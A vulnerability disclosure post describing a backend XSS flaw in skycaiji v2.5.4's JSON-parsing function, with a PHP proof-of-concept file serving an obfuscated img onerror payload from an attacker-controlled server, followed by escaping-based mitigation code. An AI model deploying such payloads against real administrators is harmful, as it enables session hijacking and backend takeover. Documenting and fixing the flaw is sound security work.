skycaiji-v2.5.4 has a backend XSS vulnerability


First, download the source code from the following address:

https://down.chinaz.com/api/index/download?id=38972&type=code

Place it directly in the root directory of the website, browse to the server IP, and follow the prompts to install.

After installation, log in to the backend.

image-20230502232501330

Click through to the function shown above.

This is a JSON parsing function, but it has no complete XSS protection in place.

We can build a file that returns JSON ourselves and then have the function access it. The JSON it returns carries an XSS payload, which triggers the XSS code in the backend.

<?php
$data = array(
    'name' => 'John  <img src=\'x\' onerror=\"eval(String.fromCharCode(97,108,101,114,116,40,39,88,83,83,39,41))\">',
    'age' => 30,
    'email' => 'johndoe@example.com',
);
 
$json = json_encode($data);
 
header('Content-type: application/json');
echo $json;

This code returns JSON data containing a malicious payload.

We deploy it on our own VPS and induce the backend administrator to parse its data, and we find that the XSS code triggers successfully.


Attackers can use this vulnerability to do anything that JavaScript code can do.
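The missing protection is output encoding of the values parsed from the remote JSON. The sketch below is an added example, not skycaiji's code: `escape_for_html` and `decode_remote_json` are hypothetical names, and it assumes PHP 8 and that the backend writes the decoded fields into an HTML page.

```php
<?php
declare(strict_types=1);

// Hypothetical helper (not a skycaiji function): escape every key and
// string value of decoded JSON for output in an HTML context.
function escape_for_html(mixed $value): mixed
{
    if (is_array($value)) {
        $out = [];
        foreach ($value as $key => $item) {
            // Keys come from the remote side too, so escape them as well.
            $safeKey = is_string($key)
                ? htmlspecialchars($key, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8')
                : $key;
            $out[$safeKey] = escape_for_html($item);
        }
        return $out;
    }
    if (is_string($value)) {
        return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    }
    return $value; // int, float, bool and null carry no markup
}

// Hypothetical helper: decode a remote response strictly, then escape it.
function decode_remote_json(string $raw): array
{
    // Throws JsonException on malformed input; nesting depth capped at 32.
    $data = json_decode($raw, true, 32, JSON_THROW_ON_ERROR);
    if (!is_array($data)) {
        throw new UnexpectedValueException('expected a JSON object or array');
    }
    return escape_for_html($data);
}

// Constructed sample response with the same fields as the post's file.
$raw = json_encode([
    'name'  => 'John <img src="x" onerror="alert(1)">',
    'age'   => 30,
    'email' => 'johndoe@example.com',
]);

// The markup now reaches the page as inert text (&lt;img ...&gt;).
foreach (decode_remote_json($raw) as $field => $value) {
    echo "<td>{$field}</td><td>{$value}</td>\n";
}
```

This encoding covers HTML element content and quoted attribute values only; values written into script blocks or URLs need encoding for those contexts instead.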

